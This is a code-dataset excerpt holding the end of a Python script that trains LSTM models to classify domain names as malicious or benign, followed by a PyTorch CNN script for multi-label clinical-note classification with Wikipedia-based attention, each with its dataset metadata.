'wb') as f:\n pickle.dump(uniques, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['catIndex']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test, len(uniques)\n\n\ndef get_model_info(model_type, config):\n '''get_model_info: returns a dictionary with key value pairs of model file keys and model file names. The model file names are full path names anchored to the root_dir and placed in the models directory.\n\n type: a string indicating the type of model ['binary', ['multiclass']\n config: a dict filled with configuration parameters\n\n return: dict of model:filename pairs\n '''\n\n if model_type == 'binary':\n model = config['binary_model']\n elif model_type == 'multiclass':\n model = config['multiclass_model']\n else:\n # this branch shouldn't happen with the way parse_args() written\n msg = \"error: unsupported model type '{}'.\".format(model_type)\n raise argparse.ArgumentTypeError(msg)\n exit(1)\n\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n model = {\n 'model_json': root_dir+models_dir+model['model_json'],\n 'model_H5': root_dir+models_dir+model['model_H5'],\n 'model_tokenizer': root_dir+models_dir+model['model_tokenizer'],\n 'model_categories': root_dir+models_dir+model['model_categories'],\n 'model_algorithm': model['model_algorithm']\n }\n\n return model\n\n\ndef find_file(filename, config):\n '''find_file: looks for the file in a few directories and moves it into the models_dir. Returns the full path to the training file.\n\n return: string of full file path in the models_dir or an empty string\n '''\n root_dir = config['root_dir']\n downloads_dir = config['downloads_dir']\n staging_dir = config['staging_dir']\n models_dir = config['models_dir']\n\n # look for file in models_dir\n # look for file in staging_dir\n # look for file in downloads_dir\n if os.path.isfile(root_dir+models_dir+filename):\n return root_dir+models_dir\n elif os.path.isfile(root_dir+staging_dir+filename):\n return root_dir+staging_dir\n elif os.path.isfile(root_dir+downloads_dir+filename):\n return root_dir+downloads_dir\n else:\n return ''\n # msg = \"The given file '{}' does not exist at any of these locations '{}', '{}', '{}'.\".format(\n # filename,\n # models_dir,\n # staging_dir,\n # downloads_dir\n # )\n # print(msg)\n # exit(1)\n\n\ndef get_model_type(model_type):\n '''get_model_type: evaluates model_type to see if it is a valid option. If model_type is empty, function will attempt to pull the parameters from the command line. This function should mirror the choices in parse_args() for -m/--models.\n\n return: a string with the model_type; empty string if not correct.\n '''\n if model_type is '':\n args = parse_args()\n return args['model']\n elif model_type.lower() == 'binary':\n return 'binary'\n elif model_type.lower() == 'multiclass':\n return 'multiclass'\n else:\n return ''\n\n\ndef get_train_file(filename, config):\n '''get_train_file: evaluates the filename as well as command line arguments to get the training file name. Verifies that the training file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n train_file = args['train']\n if train_file is not None:\n # extract the filename from the parameter list\n train_file = train_file[0]\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n else:\n # the command line parameter for train_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n\n\ndef get_inference_file(filename, config):\n '''get_inference_file: evaluates the filename as well as command line arguments to get the inference file name. Verifies that the inference file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n inference_file = args['inference']\n if inference_file is not None:\n # extract the filename from the parameter list\n inference_file = inference_file[0]\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n else:\n # the command line parameter for inference_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n\n\ndef load_inference_data(filename):\n '''load_inference_data: reads data from the given filename. The file must be a text file with '\\n' at the end of each entry, one entry per line.\n\n returns: list of data to be analyzed\n '''\n domains = []\n with open(filename, 'rt', newline='\\n') as f:\n lines = f.readlines()\n\n for line in lines:\n domains.append(line.strip())\n\n return domains\n\n\ndef write_predictions(domains, predictions, model_type, model_algo, version, config):\n '''write_predictions: takes a 1-D list of domains and predictions and writes them to the inference file output. File name will be 'predictions_YYYY-MM-DD.txt'.\n '''\n\n # create filename\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n # get the current date and time:\n datestamp = time.strftime('%Y-%m-%d', time.gmtime())\n timestamp = time.strftime('%H:%M.%S', time.gmtime())\n\n output_file = root_dir+models_dir+model_type+model_algo+'_predictions_'+datestamp+'_v'+version+'.csv'\n\n # write the predictions to disk\n with open(output_file, 'wt') as f:\n f.write('creation_date: {} {}\\n'.format(datestamp, timestamp))\n for i, p in enumerate(predictions):\n # print('i: {}, p: {}, domains: {}'.format(i, p, domains[i]))\n f.write('{}, {}\\n'.format(domains[i], p))\n\n\ndef get_version_number(filename):\n '''get_version_number: extracts the version number from the filename.\n\n returns: string with a version number in it.\n '''\n basename = os.path.basename(filename)\n reg = re.compile(r'(?:_v\\d+)|$', flags=re.IGNORECASE)\n return re.search(reg, basename).group()[2:]\n\n\ndef run(config_file=None, model_type='', train_file='', inference_file=''):\n # get configuration parameters\n config_file = get_config_filename(config_file)\n config = get_config(config_file)\n # print('configuration settings:')\n # pprint(config)\n\n # parse function/command line parameters\n model_type = get_model_type(model_type)\n train_file = get_train_file(train_file, config)\n inference_file = get_inference_file(inference_file, config)\n\n # assemble the path to the log directory\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n logpath = root_dir+models_dir\n\n if model_type == '':\n print(\"error: an invalid model type was given. See the -h/--help command line options for valid model choices.\")\n exit(1)\n\n if train_file == '' and inference_file == '':\n print(\"error: neither train or inference were given as arguments. Please run again, but with either -t/--train or -i/--inference options (or both) enabled.\")\n exit(1)\n\n # get the model information from the configuration file\n model_info = get_model_info(model_type, config)\n metrics = {\n 'filename': '',\n 'filedate': '',\n 'time': 0.0,\n 'memory': 0.0,\n 'total_rows': 0,\n 'malicious_rows': 0,\n 'benign_rows': 0,\n 'ratio': 0.0,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n if train_file != '':\n # a training file was provided\n model_version = get_version_number(train_file)\n\n # get training data from disk\n df, metrics = get_training_data(train_file, metrics, logpath)\n\n if model_type == 'binary':\n X_train, X_test, Y_train, Y_test = prep_training_dataset_binary(df)\n metrics['model'] = model_type\n metrics['categories'] = 2\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n # pprint(metrics)\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n train_model = lstm_binary.LSTMBinary()\n start_time = time.time()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n\n elif model_type == 'multiclass':\n # create X and Y and split into train and test\n X_train, X_test, Y_train, Y_test, categories = prep_training_dataset_multiclass(\n df, model_info['model_categories'])\n metrics['model'] = model_type\n metrics['categories'] = categories\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n start_time = time.time()\n train_model = lstm_multiclass.LSTMMulti()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # train the model (which model is set by models input)\n # train_model.train(X_train, Y_train)\n # train_model.save(TOKENIZER_FILE, MODEL_JSON, MODEL_H5)\n # save the model to disk\n\n if inference_file != '':\n # an inference file was provided\n model_version = get_version_number(inference_file)\n print('inference file: {}'.format(inference_file))\n if model_type == 'binary':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_binary.LSTMBinary()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n\n # write_to_train_logfile(metrics, logpath, True)\n elif model_type == 'multiclass':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_multiclass.LSTMMulti()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions, pred_prob = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n # predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # get test data\n # load the model (based on models input)\n # testmodel = lstm_binary.LSTMBinary()\n # testmodel.load(BINARY_TOKENIZER_FILE, BINARY_MODEL_JSON, BINARY_MODEL_H5)\n # make predictions\n # urllist = [\"www.google.com\", \"www.netflix.com\", \"plvklpgwivery.com\"]\n # urltypes = testmodel.predict(urllist)\n # print(\"URL type:\", urltypes)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "code/models/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 26220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 95, "usage_type": "call"}, {"api_name": "json.load", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 175, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.factorize", "line_number": 239, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 248, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 248, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 440, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 458, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 458, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 459, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 522, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 522, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 523, "usage_type": "call"}, {"api_name": "time.time", "line_number": 524, "usage_type": "call"}, {"api_name": "time.time", "line_number": 526, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.time", "line_number": 546, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 547, "usage_type": "call"}, {"api_name": "time.time", "line_number": 549, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 573, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 573, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 575, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 586, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 594, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 608, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 608, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 610, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 622, "usage_type": "call"}, {"api_name": "time.time", "line_number": 624, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 630, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 630, "usage_type": "call"}]} +{"seq_id": "577887414", "text": "import torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(1)\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nimport copy\n\n##########################################################\n\nlabel_to_ix=np.load('label_to_ix.npy').item()\nix_to_label=np.load('ix_to_label.npy')\ntraining_data=np.load('training_data.npy')\ntest_data=np.load('test_data.npy')\nval_data=np.load('val_data.npy')\nword_to_ix=np.load('word_to_ix.npy').item()\nix_to_word=np.load('ix_to_word.npy')\nnewwikivec=np.load('newwikivec.npy')\nwikivoc=np.load('wikivoc.npy').item()\n\n\n\nwikisize=newwikivec.shape[0]\nrvocsize=newwikivec.shape[1]\nwikivec=autograd.Variable(torch.FloatTensor(newwikivec))\n\nbatchsize=32\n\n\n\ndef preprocessing(data):\n\n new_data=[]\n for i, note, j in data:\n templabel=[0.0]*len(label_to_ix)\n for jj in j:\n if jj in wikivoc:\n templabel[label_to_ix[jj]]=1.0\n templabel=np.array(templabel,dtype=float)\n new_data.append((i, note, templabel))\n new_data=np.array(new_data)\n \n lenlist=[]\n for i in new_data:\n lenlist.append(len(i[0]))\n sortlen=sorted(range(len(lenlist)), key=lambda k: lenlist[k]) \n new_data=new_data[sortlen]\n \n batch_data=[]\n \n for start_ix in range(0, len(new_data)-batchsize+1, batchsize):\n thisblock=new_data[start_ix:start_ix+batchsize]\n mybsize= len(thisblock)\n numword=np.max([len(ii[0]) for ii in thisblock])\n main_matrix = np.zeros((mybsize, numword), dtype= np.int)\n for i in range(main_matrix.shape[0]):\n for j in range(main_matrix.shape[1]):\n try:\n if thisblock[i][0][j] in word_to_ix:\n main_matrix[i,j] = word_to_ix[thisblock[i][0][j]]\n \n except IndexError:\n pass # because initialze with 0, so you pad with 0\n \n xxx2=[]\n yyy=[]\n for ii in thisblock:\n xxx2.append(ii[1])\n yyy.append(ii[2])\n \n xxx2=np.array(xxx2)\n yyy=np.array(yyy)\n batch_data.append((autograd.Variable(torch.from_numpy(main_matrix)),autograd.Variable(torch.FloatTensor(xxx2)),autograd.Variable(torch.FloatTensor(yyy))))\n return batch_data\nbatchtraining_data=preprocessing(training_data)\nbatchtest_data=preprocessing(test_data)\nbatchval_data=preprocessing(val_data)\n\n\n\n\n######################################################################\n# Create the model:\n\nEmbeddingsize=100\nhidden_dim=200\nclass CNN(nn.Module):\n\n def __init__(self, batch_size, vocab_size, tagset_size):\n super(CNN, self).__init__()\n self.hidden_dim = hidden_dim\n self.word_embeddings = nn.Embedding(vocab_size+1, Embeddingsize, padding_idx=0)\n self.embed_drop = nn.Dropout(p=0.2)\n \n self.hidden2tag = nn.Linear(300, tagset_size)\n \n \n self.convs1 = nn.Conv1d(Embeddingsize,100,3)\n self.convs2 = nn.Conv1d(Embeddingsize,100,4)\n self.convs3 = nn.Conv1d(Embeddingsize,100,5)\n \n \n self.layer2 = nn.Linear(Embeddingsize, 1,bias=False)\n self.embedding=nn.Linear(rvocsize,Embeddingsize)\n self.vattention=nn.Linear(Embeddingsize,Embeddingsize)\n \n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(0.2)\n \n def forward(self, vec1, nvec, wiki, simlearning):\n \n thisembeddings=self.word_embeddings(vec1)\n thisembeddings = self.embed_drop(thisembeddings)\n thisembeddings=thisembeddings.transpose(1,2)\n \n output1=self.tanh(self.convs1(thisembeddings))\n output1=nn.MaxPool1d(output1.size()[2])(output1)\n \n output2=self.tanh(self.convs2(thisembeddings))\n output2=nn.MaxPool1d(output2.size()[2])(output2)\n \n output3=self.tanh(self.convs3(thisembeddings))\n output3=nn.MaxPool1d(output3.size()[2])(output3)\n \n output4 = torch.cat([output1,output2,output3], 1).squeeze(2)\n \n if simlearning==1:\n nvec=nvec.view(batchsize,1,-1)\n nvec=nvec.expand(batchsize,wiki.size()[0],-1)\n wiki=wiki.view(1,wiki.size()[0],-1)\n wiki=wiki.expand(nvec.size()[0],wiki.size()[1],-1)\n new=wiki*nvec\n new=self.embedding(new)\n vattention=self.sigmoid(self.vattention(new))\n new=new*vattention\n vec3=self.layer2(new)\n vec3=vec3.view(batchsize,-1)\n \n \n vec2 = self.hidden2tag(output4)\n if simlearning==1:\n tag_scores = self.sigmoid(vec2.detach()+vec3)\n else:\n tag_scores = self.sigmoid(vec2)\n \n \n return tag_scores\n\n######################################################################\n# Train the model:\n\ntopk=10\n\ndef trainmodel(model, sim):\n print ('start_training')\n modelsaved=[]\n modelperform=[]\n topk=10\n \n \n bestresults=-1\n bestiter=-1\n for epoch in range(5000): \n model.train()\n \n lossestrain = []\n recall=[]\n for mysentence in batchtraining_data:\n model.zero_grad()\n \n targets = mysentence[2].cuda()\n tag_scores = model(mysentence[0].cuda(),mysentence[1].cuda(),wikivec.cuda(),sim)\n loss = loss_function(tag_scores, targets)\n loss.backward()\n optimizer.step()\n lossestrain.append(loss.data.mean())\n print (epoch)\n modelsaved.append(copy.deepcopy(model.state_dict()))\n print (\"XXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n model.eval()\n \n recall=[]\n for inputs in batchval_data:\n \n targets = inputs[2].cuda()\n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n \n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n \n print ('validation top-',topk, np.mean(recall))\n \n \n \n modelperform.append(np.mean(recall))\n if modelperform[-1]>bestresults:\n bestresults=modelperform[-1]\n bestiter=len(modelperform)-1\n \n if (len(modelperform)-bestiter)>5:\n print (modelperform,bestiter)\n return modelsaved[bestiter]\n \nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\n\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\n\nbasemodel= trainmodel(model, 0)\ntorch.save(basemodel, 'CNN_model')\n\nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\nmodel.load_state_dict(basemodel)\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\nKSImodel= trainmodel(model, 1)\ntorch.save(KSImodel, 'KSI_CNN_model')\n\ndef testmodel(modelstate, sim):\n model = CNN(batchsize, len(word_to_ix), len(label_to_ix))\n model.cuda()\n model.load_state_dict(modelstate)\n loss_function = nn.BCELoss()\n model.eval()\n recall=[]\n lossestest = []\n \n y_true=[]\n y_scores=[]\n \n \n for inputs in batchtest_data:\n \n targets = inputs[2].cuda()\n \n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n\n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n lossestest.append(loss.data.mean())\n y_true.append(targets)\n y_scores.append(tag_scores)\n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n \n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n y_true=np.concatenate(y_true,axis=0)\n y_scores=np.concatenate(y_scores,axis=0)\n y_true=y_true.T\n y_scores=y_scores.T\n temptrue=[]\n tempscores=[]\n for col in range(0,len(y_true)):\n if np.sum(y_true[col])!=0:\n temptrue.append(y_true[col])\n tempscores.append(y_scores[col])\n temptrue=np.array(temptrue)\n tempscores=np.array(tempscores)\n y_true=temptrue.T\n y_scores=tempscores.T\n y_pred=(y_scores>0.5).astype(np.int)\n print ('test loss', np.mean(lossestest))\n print ('top-',topk, np.mean(recall))\n print ('macro AUC', roc_auc_score(y_true, y_scores,average='macro'))\n print ('micro AUC', roc_auc_score(y_true, y_scores,average='micro'))\n print ('macro F1', f1_score(y_true, y_pred, average='macro') )\n print ('micro F1', f1_score(y_true, y_pred, average='micro') )\n\nprint ('CNN alone: ')\ntestmodel(basemodel, 0)\nprint ('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nprint ('KSI+CNN: ')\ntestmodel(KSImodel, 1)", "sub_path": "KSI_CNN.py", "file_name": "KSI_CNN.py", "file_ext": "py", "file_size_in_byte": 9837, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 120, "usage_type": 